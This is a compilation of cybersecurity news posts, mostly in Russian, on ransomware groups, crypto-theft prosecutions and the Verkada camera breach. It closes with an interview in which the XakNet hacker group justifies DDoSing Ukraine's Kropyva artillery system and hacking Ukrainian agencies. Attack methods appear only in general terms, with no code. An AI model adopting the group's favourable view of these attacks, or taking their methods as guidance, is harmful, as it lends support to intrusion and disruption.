The Babuk Locker operators [halted their operations](https://securityaffairs.co/wordpress/119006/cyber- crime/paradise-ransomware-code-leaked.html) at the end of April after the attack against the [Washington, DC police department](https://www.forbes.com/sites/thomasbrewster/2021/05/13/ransomware- hackers-claim-to-leak-250gb-of-washington-dc-police-data-after-cops-dont- pay-4-million-ransom/). Experts believe that the decision of the group to leave the ransomware practice could be the result of an operational error, it was a bad idea to threaten the US police department due to the information that it manages.
The ransomware gang broke into the Washington, D.C., Metropolitan Police Department, encrypted its files and demanded a $4 million ransom.
At the end of May, the Babuk ransomware operators rebranded their ransomware leak site into Payload.bin and started offering the opportunity to other gangs to use it to leak data stolen from their victims.
The builder allows creating custom versions of the Babuk Locker ransomware that works for Windows systems, ARM-based network storage attached (NAS) devices, and VMWare ESXi servers.
Now the group seems to have suffered a ransomware attack, threat actors flooded their forum, a Dark Web ransomware forum called ****, with gay orgy porn images. The attackers also demanded $5K in bitcoin to the Babuk gang that refused to pay the ransom.
The analysis of the Bitcoin address used by the threat actor to request the payment is still empty
Click to expand...
В новом вредоносе реализована надежная схема шифрования с использованием алгоритмов NTRUEncrypt и ChaCha20-Poly1305.
Исследователи SentinelOne обнаружили, что группировка Vice Society обзавелась кастомным вымогательским ПО, в котором реализована надежная схема шифрования с использованием алгоритмов NTRUEncrypt и ChaCha20-Poly1305. Эта версия шифровальщика получила название PolyVice. Она использовалась в одной из последних атак банды и добавляла расширение .ViceSociety ко всем зашифрованным файлам. Записки о выкупе под названием AllYFilesAE создавались в каждом зашифрованном каталоге.
Исследователи предполагают, что программа-вымогатель находится на ранних стадиях разработки, так как в ее коде были обнаружены отладочные сообщения. Кроме того, PolyVice оказалась крайне похожа на RedAlert, из-за чего специалисты выдвинули предположение, что эти программы разработаны одной и той же группировкой.
Дальнейшее расследование также показало, что кодовая база полезной нагрузки Vice Society для Windows использовалась для создания полезных нагрузок группировками Chily и SunnyDay.
Схема шифрования, используемая PolyVice, сочетает асимметричное и симметричное шифрование для надежного шифрования файлов. Вредонос использует квантово- устойчивый алгоритм NTRUEncrypt для асимметричного шифрования и алгоритма ChaCha20-Poly1305 для симметричного шифрования.
Вредонос использует функцию CreateThread для создания нескольких рабочих процессов и полагается на вызов WaitForMultipleObject для синхронизации с основным потоком. Основной поток и рабочие потоки используют порт завершения ввода-вывода для обмена данными.
PolyVice выборочно применяет прерывистое шифрование:
В заключении отчета говорится, что появление PolyVice сделало группировку еще сильнее за счет надежной схемы шифрования.
source: sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group- and-the-threat-of-outsourced-development
Эксплойт для уязвимостей в программах-вымогателях от Conti, REvil и LockBit блокирует шифрование.
Операторы шифровальщиков часто используют уязвимости для проникновения в корпоративные сети. Однако в программах-вымогателях тоже есть бреши, которые сумел найти специалист из MalVuln project под ником hyp3rlinx . Он изучал не только старые семейства вымогателей – REvil и Conti, но и новичков вроде Black Basta, LockBit и AvosLocker. Согласно отчетам на сайте эксперта, все шифровальщики имеют проблемы с безопасностью, которые можно использовать для остановки самого разрушительного этапа атаки – шифрования файлов.
Анализируя образцы вредоносных программ различных хакерских группировок, hyp3rlinx обнаружил у всех образцов уязвимость к перехвату DLL. Данный метод используют злоумышленники для внедрения вредоносного кода в официальные приложения.
Перехват DLL работает только в Windows-системах, используя способ поиска и загрузки необходимых DLL-файлов в память приложений. Программа с недостаточным количеством проверок может загрузить DLL за пределами своего каталога, повышая привилегии или выполняя вредоносный код.
По словам специалиста, для уязвимых образцов вымогательского ПО от Conti, REvil, LockBit, Black Basta, LockiLocker и AvosLocker, эксплойт способен завершить работу вредоносной программы перед началом шифрования. Чтобы использовать уязвимости шифровальщика, нужно скомпилировать код эксплойта в DLL-файл с определенным именем. Тогда программа-вымогатель распознает файл как собственный и загрузит для начала шифрования данных.
На видео hyp3rlinx использует перехват DLL в программе-вымогателе от REvil и успешно завершает процесс шифрования данных до его начала.
“Для защиты от этих семейств вымогателей, DLL можно поместить в место, где злоумышленники будут запускать свое ПО, например в сеть с важными данными”, – сказал hyp3rlinx. “После загрузки DLL-эксплоита процесс программы-вымогателя должен завершиться до начала шифрования данных”.
Исследователь отмечает, что, в то время, когда вредоносное ПО отключает системы безопасности на зараженной машине, оно не может ничего сделать против перехвата DLL, поскольку это просто файлы, хранящиеся на диске хоста и неактивные до момента запуска.
Пока неясно, какие версии вредоносных программ оказались уязвимы к обнаруженной проблеме. Если образцы новые, то эксплоит будет работать недолго, поскольку вымогатели быстро исправляют попавшие в открытый доступ ошибки. Эксплоиты могут быть рабочими еще некоторое время, но компании все равно рискуют стать жертвами вымогателей, поскольку кража данных с целью получения выкупа – неотъемлемая часть подобных угроз.
Но даже при таком раскладе эксплойты все равно окажутся полезными для предотвращения нарушений работы, способных нанести компании-жертве колоссальный ущерб.
source: youtube.com/watch?v=Sb2fKCOSoew&ab_channel=malvuln
Гэри Джеймс Хармон присвоил криптовалюту, которая была изъята федеральным правительством в рамках уголовного дела его брата.
31-летний житель штата Огайо Гэри Джеймс Хармон (Gary James Harmon) признал себя виновным в присвоении криптовалюты, изъятой американскими правоохранителями у его брата Ларри Хармона (Larry Harmon) в ходе уголовного дела.
Согласно сообщению ведомства, криптовалюта ранее принадлежала брату Гэри, Ларри Хармону, организатору работы криптомиксера Helix, предназначенного для «запутывания» криптотранзакций. Ларри был арестован в феврале 2020 года по обвинению в отмывании денег. Обвиняемый позже признал, что через Helix было отмыто более 350 000 биткоинов, которые на момент совершения транзакций оценивались в более чем $300 млн.
В ходе ареста правоохранительные органы изъяли у Ларри Хармона различные активы, в том числе кошелек с криптовалютой.
Сразу после ареста полиция не смогла получить доступ к биткоинам, хранящимся на устройстве. Поэтому брат задержанного решил не терять лишнего времени и воспрепятствовать предстоящей конфискации криптоактивов.
Гэри Хармон использовал учетные данные своего брата, и тайно перевел более 712 BTC на свой адрес. При этом молодой человек использовал два сервиса для микширования. По данным правоохранителей, часть украденных средств Хармон потратил на крупные покупки и личные расходы.
Сотрудники отдела киберпреступности Налоговой службы округа Колумбия вычислили нарушителя. В результате Гэри Хармон был арестован и признал себя виновным в мошенничестве с использованием электронных средств и воспрепятствовании правосудию. Молодому человеку грозит до 40 лет тюрьмы.
source: justice[.]gov/usao-dc/pr/ohio-man-pleads-guilty-unlawfully-stealing- over-712-seized-bitcoin-subject-forfeiture
Октябрьский районный суд Мариуполя вынес приговор несовершеннолетнему украинцу за распространение вредоносного программного обеспечения через мессенджер Telegram.
Лицеист Мариупольского морского лицея, в свободное от учебы время, решил подзаработать, продавая ПО для взлома компьютеров пользователям мессенджера Telegram. Вознаграждение юноша получал на карточку Приватбанка.
По заключению эксперта, вышеуказанное программное обеспечение является вредоносным ПО типа «Ramson/Winlock», имеющее функционал блокировки доступа к компьютеру и вымогательство (шантаж) выкупа от зараженного компьютера.
В судебном заседании обвиняемый рассказал, что в начале октября 2020 года один из пользователей Telegram предложил ему создать программное обеспечение для блокировки работы компьютера. Обратившись к своему знакомому с такой просьбой, он получил соответствующую программу, которую за 300 грн прислал заказчику.
В дальнейшем, к нему обратился еще один пользователь мессенджера с аналогичной просьбой, которому он также реализовал вредоносное ПО в этот раз уже за 350 грн. В содеянном юный предприниматель искренне раскаялся и попросил суд освободить его от уголовной ответственности и передать под надзор отцу.
Действия обвиняемого суд квалифицировал по ч.1 ст.361-1 УК Украины и по ч.2 ст. 361-1 УК Украины, как умышленный сбыт вредоносных программных средств, предназначенных для несанкционированного вмешательства в работу электронно- вычислительных машин (компьютеров), совершенный повторно.
На основании п. 3 ч. 2 ст. 105 УК Украины суд освободил обвиняемого от наказания без определения его вида и размера и применил принудительные меры воспитательного характера, а именно - передал его под надзор отца до достижения совершеннолетия.
Кроме этого, суд обязал юношу оплатить сумму в размере 8989 грн. 75 коп за проведение экспертиз.
Госдепартамент США объявил вознаграждение до 10 миллионов долларов за информацию о хакерах, участвующих в кибератаках против критической инфраструктуры США по указанию иностранных правительств. Инициатива представлена в рамках программы «Rewards for Justice» — подразделения Госдепартамента, которое занимается поиском лиц, представляющих угрозу национальной безопасности США.
В центре внимания — группировка Shahid Hemmat, которая, по данным департамента, действует под контролем Корпуса стражей исламской революции (КСИР). Четверо иранских хакеров — Манучехр Акбари, Амир Хосейн Хосейни, Мохаммад Хосейн Моради и Мохаммад Реза Рафатинежад (Manuchehr Akbari, Amir Hosein Hoseini, Mohammad Hosein Moradi, and Mohammad Reza Rafatinezhad) — названы ключевыми фигурами группировки.
По данным Госдепа, злоумышленники организовывали масштабные кибератаки на оборонный сектор США и международные транспортные сети. Действия хакеров классифицируются как нарушение закона США о компьютерном мошенничестве и злоупотреблениях.
Также установлено, что группировка Shahid Hemmat взаимодействует с другими лицами и организациями, связанными с КСИР, среди которых Мохаммад Багер Ширинкар, Мехди Лашгариан и Алиреза Шафие Насаб. В числе задействованных подставных компаний — Emennet Pasargad, Dadeh Afzar Arman (DAA) и Mehrsam Andisheh Saz Nik (MASN).
rewardsforjustice.net/rewards/shahid-hemmat
Компания Engineered Arts разместила на своем YouTube канале интервью с роботом-гуманоидом Ameca.
Ameca создан по подобию человека и умеет демонстрировать различные выражения лица, включая подмигивание, поджатие губ и сморщивание носа.
Как отметили исследователи, ролик не является постановочным. Представители разработчика заверили, что паузы в речи Ameca — это задержка на обработку речевого ввода, генерацию ответа и обратную обработку текста в речь.
«Ameca сочетает автоматическое распознавание речи с GPT 3 — большой языковой моделью, которая генерирует осмысленные ответы»
Click to expand...
пояснили исследователи в описании к видео. Полученный результат передается в онлайн-сервис TTS, который генерирует голос и визуализирует синхронизацию губ.
На вопрос для чего используются роботы-гуманоиды, Ameca ответил: «Существует множество возможных применений роботов-гуманоидов. Некоторые примеры включают помощь людям с ограниченными возможностями, оказание помощи в опасных условиях, проведение исследований и действия в служение компаньона».
Ameca также отверг возможность захвата роботами мира и заверил, что они нужны для того, чтобы служить и помогать людям, а не в качестве их замены.
«Не стоит беспокоиться, роботы никогда не захватят мир. Мы здесь для того, чтобы помогать людям и служить им, а не заменить их»
Click to expand...
ответил робот в ролике.
Bloomberg сообщает, что группе хакеров удалось получить доступ к камерам наблюдения, установленным в компаниях Tesla, Equinox, медицинских клиниках, тюрьмах и банках. Помимо изображения с камер взломщики опубликовали скриншоты, доказывающие, что у них был прямой доступ к системам наблюдения, установленных в штаб-квартирах Cloudflare и Telsa. Операция группы проходила под хештегом #OperationPanopticon.
Издание Bleeping Computer связалось с реверс-инженером группировки, Тилли Коттманн, и та рассказала, что доступ был получен благодаря компрометации учетной записи суперадминистратора компании Verkada, которая занимается корпоративными системами безопасности, включая видеонаблюдение, и работает со всеми пострадавшими. Якобы эти учтенные данные были жестко закодированы и найдены в открытой DevOps инфраструктуре.
В своем Twitter Коттманн опубликовала несколько изображений, полученных с камер наблюдения в Equinox, Tesla и Bank of Utah.
Склад Tesla
Также она обнародовала скриншоты root-доступа к некой системе. Так как на изображении виден MAC-адрес одной из сетевых карт, журналисты смогли убедиться, что тот соответствует оборудованию Verkada.

Вскоре после публикации Bloomberg группировка потеряла доступ к учетной записи суперадминистратора, так как инженеры Verkada узнали о взломе.
«Мы отключили все учетные записи внутренних администраторов, чтобы предотвратить любой несанкционированный доступ. Группа внутренней безопасности и внешняя служба безопасности изучают масштабы этого инцидента, и мы уже уведомили о случившееся правоохранительные органы», — заявили в компании.
Click to expand...
Представители Cloudflare подтвердили факт взлома, но говорят, что скомпрометированные камеры располагались в офисах, которые закрыты уже много месяцев, и инцидент никак не повлиял на клиентов и продукты компании. В настоящее время все проблемные камеры уже отключены.
Никаких комментариев от Tesla, Equinox и другим пострадавших пока не поступало.
Источник: xakep.ru/2021/03/10/verkada-superadmin/
Пришёл я к вам с хорошими новостями по поводу биржи телеграм юзернеймов от Дурова - fragment.com.
Для начала поделюсь с вами своими успехами. Первые норм бабки пришли на этой
неделе - 1019$ ( 566 TON) за юзернейм @pavlovich, а так же я смог конвертнуть
в NFT несколько своих любимых юзернеймов и теперь успешно хожу с ними)
Так же почти спустя 2 месяца моего изучения торгов на фрагменте я понял, как что работает.
Самый ключевой пункт - с момента занятия вами юзернейма должно пройти 15 дней. прежде чем вы сможете выставить его на продажу.
Появилась информация о двух легионах - китайский и арабский. Собственно говоря легионы в целом - достаточно богатые группы. Мне не составило труда попасть в чат нескольких работяг из китайского легиона и успешно проведя политические разговоры касательно их взаимодействия с фрагментом узнал, что они работают на "Старшего", о котором вообще ничего не известно. Так же разузнал, что они активно охотятся за юзернеймами по типу @ddddd, @xxxxx и подобные). Представителей арабского легиона найти мне так и не удалось, однако на их кошельках я видел суммы, превосходящие 100.000 TON.
И так, что нового?
Номера на фрагменте!
Без понятия, зачем они нужны, но я на дропе закупил себе две штучки. Отмечу,
что стоимость каждого составляет 16$ и Дуров очень постарался для их
нормального пользования) Например в последних версиях Дескоптного Телеграмма
номер начал определяться, как "Анонимный" и показывается красивая кнопочка
"Получить код с Fragment". Плюсом сегодня на их сайте появился интересный
пункт - . Вы спросите,
что это значит? Я отвечу. Цена на покупку рандомного анонимного номера будет
расти, а через некоторое время нельзя будет купить рандомные Анонимные номера
самостоятельно. Только через аукцион, цены на котором будут гораздо больше,
чем изначально стоили сами номера.
Вообщем вот так по красивому сейчас выглядит мой профиль -
. Буду дальше сидеть и
собирать для вас интересную информацию по поводу Фрагмента <3
И да, прикиньте, циферки и буковки в телеграмме реально могут стоить денег.
Хакер, получивший доступ к серверам компании и укравший более 37 миллионов долларов в криптовалюте у почти 600 жертв, признал себя виновным в сговоре с целью мошенничества с использованием электронных средств и отмывания денежных инструментов.
Преступник, Эван Фредерик Лайт ( Evan Frederick Light ) из штата Индиана, США, взломал компьютерные серверы инвестиционной компании, чтобы незаконно получить доступ к информации о клиентах, и использовал это для кражи криптовалюты у клиентов, которые владели такими активами в компании, сообщило Министерство юстиции США. заявление от 1 октября.
Затем Лайт переправил средства от «кибер-вторжения» через миксеры криптовалют и игровые сайты, чтобы скрыть свою личность и скрыть средства.
Лайт признал себя виновным 30 сентября — и ему грозит до 20 лет тюремного заключения по каждому обвинению в дополнение к трем годам условно-досрочного освобождения и потенциальному штрафу. Возможна также реституция и конфискация имущества.
Обвинение ныне осужденному преступнику было предъявлено в Южной Дакоте 15 июня 2023 года. Первоначально Лайт не признал себя виновным по обвинительному заключению.
В этой жалобе Министерство юстиции заявило, что преступления были совершены в период с 2021 по май 2023 года, а Лайт действовал как минимум с еще одним неизвестным преступником.
Связанный: Рост преступлений, связанных с криптовалютой в Австралии, вызывает призыв к ужесточению регулирования
Министерство юстиции заявило громко и ясно, что намерено поймать каждого киберпреступника, находящегося в пределах его досягаемости:
«Хотя этот обвиняемый пытался скрыться в тенях киберпреступного мира, он не был вне досягаемости нашей команды», — пояснили в Министерстве юстиции.
«Сегодняшние обвинительные приговоры должны служить напоминанием о том, что это Управление и его партнеры по обеспечению правопорядка будут привлекать киберпреступников к ответственности, независимо от того, насколько изощренными могут быть их преступления».
Центр жалоб на интернет-преступления Федерального бюро расследований США сообщил, что в 2023 году американцы потеряли 5,6 миллиарда долларов из-за мошенничества с криптовалютой — на 45% больше, чем в 2022 году. В 2023 году ФБР получило около 69 000 жалоб, связанных с криптовалютами, среди которых наиболее пострадали люди старше 60 лет. Более 70% мошенничеств с криптовалютой было связано с инвестиционными схемами, а 10% были связаны с мошенничеством в колл-центрах и мошенничеством с выдачей себя за правительство.
justice[.]gov/usao-sd/pr/indiana-man-pleads-guilty-conspiracies-involving-
cyber-intrusion-and-37-million
justice[.]gov/usao-sd/pr/indiana-man-charged-federal-court-wire-fraud-and-
money-laundering-conspiracies
«XakNet Team» - российская группа хакеров и специалистов по информационной безопасности, которая появилась в феврале 2022 года и стала известна в СМИ благодаря атаке на сайт президента Украины, взлому Киберполиции Украины, публикации утечек с документами из МИД Украины, а также выведению из строя украинской системы "Кропива" для корректировки огня артиллерии при помощью DDoS-атак.
Как сообщил недавно Mash в своём Telegram-канале, хакеры XakNet Team за три минуты положили сервера украинской системы слежки и наведения "Кропива". Говорят: это первый случай применения подобного навыка в ходе военных действий. За это — грамота, за помощь в освобождении Красного Лимана от генерал-полковника ВС РФ, Начальника штаба группировки войск (сил) "Центр".
Известно, что украинская программа системы корректировки огня артиллерии разрабатывалась фирмой "Логiка". "Кропива" позволяла подразделениям оперативно обмениваться информацией, выбирать точку нанесения удара и отдавать приказы отдельным орудиям или батальонам. Софт ставился на планшеты армии Украины или распространялся через Telegram.
Блокировка системы "Кропива" помогла снизить людские потери и ослабить в значительной мере возможности украинской армии.
Представитель хакерской группы «XakNet Team» согласился дать текстовое интервью Telegram-каналу «Russian OSINT»:
Russian OSINT : Как сообщил недавно Telegram-канал Mash команда пророссийских хакеров "XakNet" за три минуты положила сервера украинской системы слежки и наведения артиллерии "Кропива". В результате взлома пророссийским хакерам удалось не допустить жертвы среди военнослужащих российской армии и гражданского населения.
Благодаря резонансному случаю становится очевидно, что хакерские кибератаки играют немаловажную роль в современных конфликтах и могут считаться эффективным оружием на поле боя.
Можете ли Вы поделиться эксклюзивными подробностями данной кибератаки, как это происходило, какие задачи ставились и почему выбрали именно "Кропива" в качестве приоритетной цели на тот момент?
XakNet Team : Подробностей не сильно много. Познакомились с ребятами которые участвуют в СВО. Они рассказали про "Кропиву". Раздобыли APK, посмотрели куда оно стучит и решили сильно не умничать, просто шарахнули по ней DDoS'ом. Сначала пробовали общими силами коллег, результата оказалось недостаточно, так как она встала. Взяли тайм-аут на ночь, накупили кучу сервачков, и утром шарахнули по полной. На этот раз она лежала, пока нам это было нужно.
На самом деле, это была самая примитивная атака из всех, которые мы делали. Просто она возымела эффект на поле боя, а такого еще не было в современной истории, ну и разошлось по СМИ. Однако, именно этот кейс - немного перевернул мировосприятие во всей команде. Было одновременно приятно, что по заверению ребят с мест - спасли не мало жизней, но в то же время не по себе.
Неприятно осознавать, что люди со стороны, без военного образования - могут вмешиваться в ход боевых действий. Причем конкретно этот кейс - показал, что сделать это могли не только мы, но и люди фактически без квалификации в сфере ИБ.
Russian OSINT : Для обывателя можете ли вы объяснить на простых примерах как происходит взлом подобных систем?
XakNet Team : Конкретно в этом случае, взлома не было, была DDoS-атака. Берутся ресурсы (скомпрометированные компьютеры, или как в нашем случае - куплены сервера) и отправляется множество запросов к серверам жертвы, что делает невозможным ее функционирование из-за перегрузки сервисов или канала. Для совсем неопытных: Соберите 10-20 тысяч человек, заставьте их перейти на нужный вам сайт одновременно - и он перестанет открываться.
Russian OSINT : Как вы считаете, оправданы ли ваши решительные действия в виде кибератак на фоне проводимой на Украине специальной операции?
XakNet Team : Честно? Не уверены, что оправданы. Все это началось спонтанно, из чувства долга. В Армии никто из нас не служил, но долг Родине отдать очень хотелось. Тут и клоуны в масках [представители движения хактивистов Anonymous], и вполне адекватные Украинские коллеги из ИБ включились. Не нашли ничего лучше, чем делать тоже, что и они. Учитывая, как наши СМИ отмалчивались, а их СМИ атаковали - было важно (на наш взгляд) показать гражданам, что не всем "стыдно быть русскими", и что есть люди которые готовы что-то делать.
Russian OSINT : Помог ли взлом "Кропивы" предотвратить реальные жертвы среди военнослужащих Российский Федерации и гражданского населения на Украине?
XakNet Team : Думаю, это очевидно. Наведение артиллерии не работало, это признанный факт. О спасении жизней мне написали ребята с мест, думаю за это и отметили наградой.
Russian OSINT : В открытых источниках утверждается, что ваша группа хакеров впервые появились в 2008 году во время конфликта в Грузией, а затем исчезла, так ли это на самом деле? Когда впервые появилась команда XakNet Team?
XakNet Team : Не совсем так. XakNet Team - это дань уважения любимому форуму, который был основан в 2007 году. Да, действительно, в 2008 мы участвовали в атаке на грузинское правительство и отметились на CNN. Но не стоит путать этот форум с реинкорнацией которая появилась несколько лет назад. Это к нам отношения не имеет, мы вот выходцы именно из того, олд-скульного хакнэта образца 2007.
Russian OSINT : Многие журналисты и СМИ задаются вопросом аффилированности хакерских группировок в киберпространстве, имеете ли вы отношение к военным или государственным структурам Российской Федерации?
XakNet Team : Нет, абсолютно. Думаю, это видно по нашим действиям. Мы работаем интуитивно, не особо понимая, что нужно, а что нет. Контакты с военными начались уже после старта нашей деятельности. Но, я уже писал как-то. Не то, что бы мы были против. Просто "в реале" контактировать ни с кем не хочется. А вот в таком формате, почему нет.
Russian OSINT : Можно ли вас назвать пророссийской группировкой хакеров? Если да, то правильно ли я понимаю, что в вашей команде есть люди самых разных национальностей, культур и вероисповеданий?
XakNet Team: Думаю, нас можно назвать прям Российской группой) По поводу
национальностей и вероисповеданий, отвечу так: В команде все без исключения
Россияне.
Russian OSINT: Ваш интерес только Украина или в других странах тоже
присутствуете? [текстовое интервью было сделано до событий с блокировкой
транзита в Калининград]
XakNet Team: На текущий момент - да. Работаем только на территории Украины, и не ввязываемся в то, чего не понимаем. Ждем какой позиции будет придерживаться правительство в адрес Литвы. Определенные наработки уже есть, но как уже говорил - вступать туда, где мы не понимаем последствий - не беремся. Не хочется расходиться с официальной повесткой государства, а учитывая, что политологов среди нас нет, и мы не умеем читать между строк - сидим и ждем.
Russian OSINT: Какие цели вы преследуете как хакерская группа, с чем Вы боритесь и можно ли считать вашу деятельность ответной защитной реакцией на киберугрозы в отношении России?
XakNet Team : Мне не очень нравится, что нас называют хакерской группой. Почему Украинских атакующих называют киберармией, а нас называют преступниками? Почему в отчетах известных компаниях есть расследования о деятельности Российских хакерских групп, но нет отчетов о деятельности Украинских групп и помощи США? Им можно, а нам нельзя и мы преступники. Это очень однобоко. Причем если брать в расчет то, что наша команда имея все возможности для парализации взломанных нами объектов - ограничивалась сливами данных, а Украинские коллеги занимались вредительством, то выглядит вообще абсурдно, что в отчетах АНБ мы, а не они.
Если не углубляться в историю, а брать во внимание ассоциацию словосочетания "хакерская группа" в головах нынешнего общества, то получается - мы преступники. Мы таковыми себя не считаем, никакого коммерческого интереса не преследуем. Мы скорее специалисты по информационной безопасности, которым не все равно. Цели очень простые, доставать информацию которая покажет людям беспристрастную правду, показать гражданам, что их не бросят, и на цифровом поприще у нашей страны нет равных.
Russian OSINT : Сегодня в киберпространстве развернулась самая настоящая киберовойна против России, где принимают участие свыше 22 группировок, об этом недавно сообщил МИД РФ.
Как бы вы описали ситуацию, что сейчас происходит?
XakNet Team : Происходит беспредел. Сегодня Российские специалисты по информационной безопасности остались одни против всего мира. Причем атакуют всех: больницы, заводы, развлекательные сайты, розничный бизнес (который вообще не может себе позволить защиту).
Russian OSINT : Часто мы слышим о самых разных утечках в российских СМИ: Яндекс.Еда, CDEK, Гемотест и другие. По вашему мнению, кто именно стоит за взломами и публикацией этих утечек, чем руководствуются недоброжелатели?
XakNet Team : Да не особо важно, кто именно стоит. Как вы сами выше уточнили, там 22 группы (а на деле их сотни), и искать кто там конкретно это делал - бессмысленно, т.к. ответственности за пределами РФ не последует. Руководствуются "собиранием донатиков" на канале) У меня складывается ощущение, что вся Украина так живет. Казалось бы, ого - СДЭК взломали. Ну а что такое СДЭК? Частная курьерская служба? Это ж не показатель вообще. Берем громкое имя, сливаем базу, говорим какие мы крутые хакеры, и получаем кучу откликов в СМИ, в т.ч. и Российских) Хайп, как по-модному сейчас принято говорить.
Russian OSINT : Cегодня самыми яркими хакерскими пророссийскими каналами в Telegram являются XakNet Team, KillNet, Beregini, Nemezida (RaHDlt), NoName057(16), Народная Cyberармия, Джокер ДНР, From Russia with Love и другие. Можете ли вы для читателя объяснить на чем конкретно вы специализируетесь?
XakNet Team : Мы специализируемся на доступам к инфраструктурам врага.
Russian OSINT : Считаете ли вы что Запад ведет кибервойну против России?
XakNet Team : Безусловно.
Russian OSINT : Пытались ли ваши недоброжелатели заблокировать ваш канал или устроить провокации в отношении XakNet Team?
XakNet Team : Да, там жалобами закидывают регулярно судя по их чатам) Но нам как-то от канала ни горячо ни холодно. Свободная Европа - разделегировала домен xaknet.team без каких либо оснований. Там даже публикации утечек не было. Сначала пробовали досить без ума и памяти, не получалось)
Russian OSINT : Почему DDoS-атаки стали одним из главных методов борьбы противоборствующих сторон?
XakNet Team : Потому, что это общедоступный метод атак которому можно "научить". Ума особого это не требует, вот и получается, что каждый второй стал хакером)
Russian OSINT : Одна из ваших атак была связана со взломом МИД Украины и утечкой внутренних документов. Чему вы больше всего удивились в результате получения конфиденциальных сведений из утечки?
XakNet Team : Удивился наглости) Украинские политики действительно очень нагло себя ведут. Они уже не просто просят, а требуют и устраивают провокации, травлю компаний, чтобы они уходили с Российского рынка. Компаниям не остается выбора и они уходят, Украинская сторона называет это солидарностью всего Мира с Украинским народом, но на деле это обыкновенный наглый шантаж. Причем очень удивляет их давление на СМИ, бизнес. И они это спокойно докладывают. Почти ничего не видно про собственный народ, только слоганы аля: Дайте деньги, Украинцы защищают Европу от России.
Russian OSINT : Вы взяли ответственность за взлом украинской Киберполиции, были ли попытки со стороны украинских правоохранительных органов вас деанонимизировать или вычислить? Можете рассказать пару интересных историй как это происходило?
XakNet Team : Честно, врать не буду, кто это делал. Но регулярно ссылочки
на сниферы получаю в форму обратной связи
.
Мы точно знаем, что они завели на нас дело, нашли у них этот документ,
опубликовали его. Поэтому, постоянно шлем им теплые приветы. Веселые ребята)
Russian OSINT : Из хакерских инструментов, чем чаще всего вы пользуетесь для решения своих задач?
XakNet Team : Логика. Атрибуцию наших действий и инструментов нельзя произвести, так как мы не оставляем их в инфраструктуре жертв.
Russian OSINT : За последние месяцы было совершено несчитанное количество кибератак на Российские компании, организации, КИИ. Причем первыми атаковать Россию начали именно прозападные хакеры и хактивисты, посеяв бесконтрольный хаос со всеми вытекающими последствиями.
В случае если государства найдут компромиссы и пойдут на диалог, то как быть с западными хактивистами, которые накачали информационно всех вокруг идеей "пентеста или DDoS без последствий" в отношении России? Даже если западные партнёры скажут лидерам хактивистов СТОП, вряд ли получится все откатить обратно, как считаете?
XakNet Team : На самом деле, как только это перестанет нести "хайп" - все перестанут этим заниматься. Если посмотреть на атаки, становится ясно, что особого вреда они не несут (не берем утечки крупного бизнеса, а говорим о ГОСах). Если брать в расчет бизнес, то это чисто их истории. Они в состоянии себе позволить специалистов, нужное оборудование. Если все будут нормально работать, никаких угроз не будет. Нет там вменяемых специалистов, которые смогут сильно навредить хорошо подготовленным компаниям.
Russian OSINT : На ваш взгляд, нужно ли России создавать полноценную профессиональную киберармию в обозримом будущем?
XakNet Team : Нет, не обязательно. Думаю стоит провести переговоры по организации контрактов с частными структурами в сфере ИБ, это будет гораздо эффективнее.
Russian OSINT : В СМИ часто упоминают хактивистов "Anonymous", которые объявили Российской Федерации кибервойну. Кто это такие и так ли страшны их утечки, кибератаки, DDoS, спам, фишинг?
XakNet Team : Это просто громкое имя. Их атаки - смешны. На наш вопрос им
в твиттер о том, когда уже перестанем досить сайты без защиты и заниматься
чем-то реальным - нас закинули в Чёрный список
.
Russian OSINT : Как вам удается не оказывать никаких услуг за деньги и содержать предположительно не самую дешёвую инфраструктуру для решения повседневных задач? Помогают ли вам финансово волонтеры?
XakNet Team : Ремарочка. Мы оказываем услуги. Но не в рамках ХакНэта. У нас есть работа. Мы квалифицированные специалисты по ИБ, с хорошими зарплатами. Я описывал это когда отвечал на абсурдную статью на канале. Расходов не так много, как кажется. А при окладе 300+ тысяч рублей +доп работах, оказывать какие-то нелегальные услуги просто глупо. Пожертвования мы не принимаем, хотя их часто предлагают. Если просят настойчиво - мы отправляем в любой Российский благотворительный фонд, где помогают больным детям на усмотрение жертвующего. Зачем принимать пожертвования, когда у тебя достаточно финансовых ресурсов? Идеей не торгуют, ей живут.
Russian OSINT : Как давно вы на хакерской "сцене"?
XakNet Team : Ну 15 лет получается. Вот, взяли и заставили почувствовать себя старым) Грустно)
Russian OSINT : Bloomberg 29 июня опубликовал статью, где по заявлению представителя Mandiant Inc. группа специалистов по информационной безопасности "XakNet Team" может быть тесно связана с Кремлём.
Компания Mandiant Inc. сообщила агентству Bloomberg News, что за недавним взломом неназванной организации, приведшим к краже данных, вероятно, стояли сотрудники российской разведки. Информация в результате взлома оказалась в руках XakNet Team, пишет Bloomberg.
Mandiant считает, что XakNet и аналогичная группа, известная как Killnet, напрямую координировали часть своей деятельности. Тем не менее Mandiant признает, что хактивисты часто руководствуются политическими или социальными причинами, а не финансовой выгодой или личным интересом, поэтому каких-либо доказательств в статье Bloomberg не приводится.
США и их союзники по разведке недавно заявили, что XakNet и другие [группы] представляют киберугрозу для критически важной инфраструктуры.
Почему такая серьёзная ИБ-компания как Mandiant пытается вас связать с Российскими властями, используя формулировки "может быть" и без какой-либо адекватной доказательной базы? Почему свои предположения они не подкрепляют фактами в виде отчётов?
Как вы можете прокомментировать статью Bloomberg и позицию Mandiant в отношении вашей группы?
XakNet Team : Это отличный вопрос) Ответ, я думаю, итак всем понятен.
Вот смотрите, есть Мандиант. Есть у них контракты, на сотни тысяч, если не миллионы долларов на защиту информации.
Есть телеграм канал, называется ХакНэт. В команде - несколько человек.
Начинается СВО, и пошло поехало. Несколько ребят наломали кучу ресурсов, в числе которых - клиенты Мандианта.
Заказчики, разумеется, зададут просто вопрос: Ну как так? Мы же столько денег отдали вам. Почему нас взломали? Да еще и черт знает кто?
Что на это ответить? Это государственная группировка. Координатором является Кремль. Финансовый ресурс не ограничен, и вообще там 1000 человек работает над этим всем. И как бы заказчик успокаивается. Ну типа, а чего ты сделаешь против целого государства?
Эту историю кушают. Так проще отбелить подмоченную репутацию и прикрыть непрофессионализм.
Russian OSINT : Как часто вам предлагают помощь новички и неравнодушные подписчики с вашего канала, задействуете ли вы их для помощи или обучаете для последующего принятия в команду?
XakNet Team : Очень часто. Идея такая есть, но проблема в том, что квалификации у этих людей нет. Мы собрали заявки, и думаем что с этим делать.
